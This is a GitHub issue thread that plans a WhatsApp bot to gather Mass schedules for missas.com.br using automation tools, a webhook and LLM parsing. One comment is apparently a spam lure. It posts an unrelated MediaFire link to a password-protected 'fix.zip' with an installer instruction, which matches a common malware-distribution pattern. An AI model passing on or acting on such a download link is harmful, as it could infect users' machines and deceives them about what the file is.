### ISSUE TITLE
[Idea] Bot to ask for schedules

### ISSUE THREAD

**Issue by lucasrcezimbra** [lucasrcezimbra/missas.com.br#10]
Ideias:
- [Activepieces](https://www.activepieces.com/) + [WhatsAble](https://www.whatsable.app/) + Webhook for incoming
- [N8N](https://n8n.io/) + WhatsApp + Webhook for incoming

Tasks:
- [ ] Get a new phone number just for automations
- [ ] Create WhatsApp business
- [ ] Create webhook to receive message notifications
- [ ] Config webhook in the business account
- [ ] Create API Key to insert times into missas.com.br
- [ ] Create the workflow to `triggered by message -> parse using LLM -> insert into missas.com.br`
- [ ] Create the workflow to `manual trigger -> send message`

**Comment by TrymenT-AlphA** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lucasrcezimbra** [comment]
Supersed by #17 and following.
